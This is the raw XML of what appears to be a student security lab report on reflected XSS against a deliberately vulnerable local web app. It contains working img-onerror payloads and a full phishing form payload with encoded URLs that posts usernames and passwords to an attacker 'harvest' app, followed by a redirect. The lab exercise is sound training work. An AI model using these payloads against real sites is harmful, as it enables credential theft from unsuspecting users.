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8916543">
      <w:pPr>
        <w:pStyle w:val="829"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 3.3D</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="51377D2B">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I first copied the project.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C0141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87480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33873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858000" cy="18748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0.00pt;height:147.6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9780B6C">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I also refactored the codebase a little by renaming the project name. Therefore, I had to update the package name at a lot of different places to ensure it works.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B31CF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13169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9259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858000" cy="2131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40.00pt;height:167.8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/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2D418B96">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">I just changed that and attempted but that didn’t work. So, I went ahead and basically updated that name in everywhere I could find it at.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D659542"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96885" cy="234010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58089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5396885" cy="23401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4.95pt;height:184.26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4473AB2D">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">I also renamed the web package name in project properties as well as I updated everything manually.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="33FC8BA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01969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26265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rot="0" flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="6858000" cy="20196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40.00pt;height:159.03pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0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44A46AD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45389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66988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858000" cy="14538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40.00pt;height:114.4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6811E33E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14284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4839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858000" cy="2142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40.00pt;height:168.7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2B36D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C7485C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66155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19912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858000" cy="3661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40.00pt;height:28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1A2BB07C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4128267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20976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858000" cy="41282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40.00pt;height:325.0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7BAE535B">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="49359547">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1475653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D09E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 also updated all the source code to complete the attacker interface. It will now store the data sent to /validate in a list and display it in /dashboard.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A062A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26921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0454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858000" cy="3269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40.00pt;height:257.4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79F3CC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C3D59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28242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63476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858000" cy="3282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540.00pt;height:258.4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6D6F3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4A4BEC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931071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7215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858000" cy="931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540.00pt;height:73.3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82EDD6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844022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874309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88543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858000" cy="28743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40.00pt;height:226.3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D1260A">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And then, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">I removed the already existing web module in the tomcat server and re-added it again to ensure it doesn’t stay cached. I already “Clean”ed the tomcat server cache before starting it up again.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="664982E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52122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31789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6858000" cy="35212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540.00pt;height:277.26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7EF1E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all of this, everything seemed to work now.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B25AA1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F6D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69484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CEBF3C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48818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 tested the /validate route by sending some sample data using curl.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6368D3F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931574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0212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858000" cy="2931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540.00pt;height:230.83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1884B53E">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And it seemed to have been stored as seen below.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="6B912220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244549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60341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858000" cy="2244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540.00pt;height:176.7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56F5FA83">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">I then started the client application and tested it out with out very basic, simple XSS payload. This did not work.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="4652AF7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&lt;script&gt;alert(“XSS on CoachwebApp”)&lt;/script&gt;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32606E">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:hyperlink r:id="rId24" w:tooltip="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cscript%3Ealert%28%22XSS+on+CoachwebApp%22%29%3B%3C%2Fscript%3E" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:highlight w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cscript%3Ealert%28%22XSS+on+CoachwebApp%22%29%3B%3C%2Fscript%3E</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="388966A2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5675" cy="94380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5783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615674" cy="9438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63.44pt;height:74.3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5675" cy="94280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70704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615674" cy="9428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63.44pt;height:74.2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CCA3C0">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">I then tested out another payload and this did work.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1EF0557C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</w:rPr>
        <w:t xml:space="preserve">&lt;img src=x style="display:none" onerror="alert('XSS on CoachwebApp')"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D861F8">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="center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  <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:hyperlink r:id="rId27" w:tooltip="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27XSS+on+CoachwebApp%27%29%22%3E" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:highlight w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27XSS+on+CoachwebApp%27%29%22%3E</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:highlight w:val="none"/>
          </w:rPr>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D9B54"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74914" cy="185286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38492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5074914" cy="18528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99.60pt;height:145.89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  <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="18E6C442">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">I then changed this message a little bit, copied the entire form and injected it. This worked too. Since this is a PoC phishing attack, to make things slightly more realistic, I updated the alert() message to “You need to log in immediately!” to give a sense of urgency.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 w14:paraId="6187042C">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="center"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51698" cy="1398128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2254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5251697" cy="1398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13.52pt;height:110.09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  <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7CB0D20C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032C6F9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7175" cy="227467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58232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5187174" cy="2274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08.44pt;height:179.1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  <w:r/>
    </w:p>
    <w:p w14:paraId="52016D99">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="71FEEC68">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="38752D13">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="752BA628">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I then pressed OK to close the alert(), and then I entered a sample username and a password.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="198116F8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00701" cy="1949953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8642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800701" cy="19499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56.75pt;height:153.5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08C5C4BB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00701" cy="170159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50341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5800701" cy="17015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56.75pt;height:133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 w14:paraId="17ACB07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3D1C17">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">It was properly logged. However, after submitting the form, I was redirected to the attackers dashboard. Therefore, I updated the /validate route mapping in the attacker dashboard to redirect to google.com instead. In a real phishing attack, we would want to redirect them to the actual service’s page.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA572A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208552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98715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6858000" cy="1208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540.00pt;height:95.16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/>
    </w:p>
    <w:p w14:paraId="6A4EA2E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117352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30025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858000" cy="11173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540.00pt;height:87.98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5275F8C5">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2CC6B829">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5CD22C44">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2F5E20C7">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="78D85011">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And now, when I submit the form, I will be redirected to google.com once I press OK in the form that was injected.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="04CAD04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985650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9239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6858000" cy="298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540.00pt;height:235.09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698F302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2985650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3883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6858000" cy="298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540.00pt;height:235.09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  <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="19126414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82425" cy="1635453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64779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5282424" cy="1635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15.94pt;height:128.78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6DD0EA30">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Also, note that the previous submissions here has been cleared because I restarted the web server. The attackers panel does not store them in a persistent database or JSON or anything like that. It’s all stored in memory and will get cleared when you restart the web server.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0EE84330">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The first form payload was:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7723ECDE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&lt;img src=x style="display:none" onerror="alert('You need to log in immediately!')"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB6CC57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&lt;h3&gt;LOGIN&lt;/h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F42C987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&lt;form action="http://localhost:8080/harvest-coachweb-springapp/validate" method="post" target="_blank"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C09CD51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&lt;label for="username"&gt;Username:&lt;/label&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB7C7D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&lt;input type="text" name="username" id="username"/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="61485701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&lt;label for="password"&gt;Password:&lt;/label&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C66F4A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&lt;input type="password" name="password" id="password"/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA34DC6">
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:line="120" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="submit" value="OK"/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="37094B71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&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC239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The encoded phishing URL for the payload above is:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="61894747">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:hyperlink r:id="rId38" w:tooltip="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E++%3Ch3%3ELOGIN%3C%2Fh3%3E++%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fharvest-coachweb-springapp%2Fvalidate%22+method%3D%22post%22+target%3D%22_blank%22%3E++%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E++%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E++%3Clabel+for%3D%22password%22%3EPassword%3A%3C%2Flabel%3E++%3Cinput+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E++%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E++%3C%2Fform%3E" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
          </w:rPr>
          <w:t xml:space="preserve">http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E++%3Ch3%3ELOGIN%3C%2Fh3%3E++%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fhar</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
          </w:rPr>
          <w:t xml:space="preserve">vest-coachweb-springapp%2Fvalidate%22+method%3D%22post%22+target%3D%22_blank%22%3E++%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E++%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E++%3Clabel+for%3D%22password%22%3EPasswo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
          </w:rPr>
          <w:t xml:space="preserve">rd%3A%3C%2Flabel%3E++%3Cinput+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E++%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E++%3C%2Fform%3E</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
          </w:rPr>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="724BB5BE">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After changing it to redirect to google, I removed the `</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">target="_blank"` section because I don’t want that tab to be opened in a new blank tab.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="56E28F3E">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The second udpated form payload was:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79094B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&lt;img src=x style="display:none" onerror="alert('You need to log in immediately!')"&gt;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0BEAB0A4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&lt;h3&gt;LOGIN&lt;/h3&gt;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404FEB89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&lt;form action="http://localhost:8080/harvest-coachweb-springapp/validate" method="post" target="_blank"&gt;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7723F279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&lt;label for="username"&gt;Username:&lt;/label&gt;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0B18FE78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&lt;input type="text" name="username" id="username"/&gt;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192712CA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&lt;label for="password"&gt;Password:&lt;/label&gt;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79E771D7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&lt;input type="password" name="password" id="password"/&gt;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735B1127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&lt;input type="submit" value="OK"/&gt;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0580B51E">
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:line="120" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/form&gt;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51A60D8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The encoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> final phishing URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the XSS payload already injected it:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="44BE57CE">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:hyperlink r:id="rId39" w:tooltip="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E+%3Ch3%3ELOGIN%3C%2Fh3%3E+%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fharvest-coachweb-springapp%2Fvalidate%22+method%3D%22post%22%3E+%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E+%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E+%3Clabel+for%3D%22password%22%3EPassword%3A%3C%2Flabel%3E+%3Cinput+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E+%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E+%3C%2Fform%3E" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
          </w:rPr>
          <w:t xml:space="preserve">http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E+%3Ch3%3ELOGIN%3C%2Fh3%3E+%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fharve</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
          </w:rPr>
          <w:t xml:space="preserve">st-coachweb-springapp%2Fvalidate%22+method%3D%22post%22%3E+%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E+%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E+%3Clabel+for%3D%22password%22%3EPassword%3A%3C%2Flabel%3E+%3Cinpu</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
          </w:rPr>
          <w:t xml:space="preserve">t+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E+%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E+%3C%2Fform%3E</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="874"/>
          </w:rPr>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  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FD619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8813E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yperlink" Target="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cscript%3Ealert%28%22XSS+on+CoachwebApp%22%29%3B%3C%2Fscript%3E" TargetMode="External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hyperlink" Target="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27XSS+on+CoachwebApp%27%29%22%3E" TargetMode="Externa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hyperlink" Target="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E++%3Ch3%3ELOGIN%3C%2Fh3%3E++%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fharvest-coachweb-springapp%2Fvalidate%22+method%3D%22post%22+target%3D%22_blank%22%3E++%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E++%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E++%3Clabel+for%3D%22password%22%3EPassword%3A%3C%2Flabel%3E++%3Cinput+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E++%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E++%3C%2Fform%3E" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E+%3Ch3%3ELOGIN%3C%2Fh3%3E+%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fharvest-coachweb-springapp%2Fvalidate%22+method%3D%22post%22%3E+%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E+%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E+%3Clabel+for%3D%22password%22%3EPassword%3A%3C%2Flabel%3E+%3Cinput+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E+%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E+%3C%2Fform%3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2026-08-21T12:20:56Z</dcterms:modified>
</cp:coreProperties>
</file>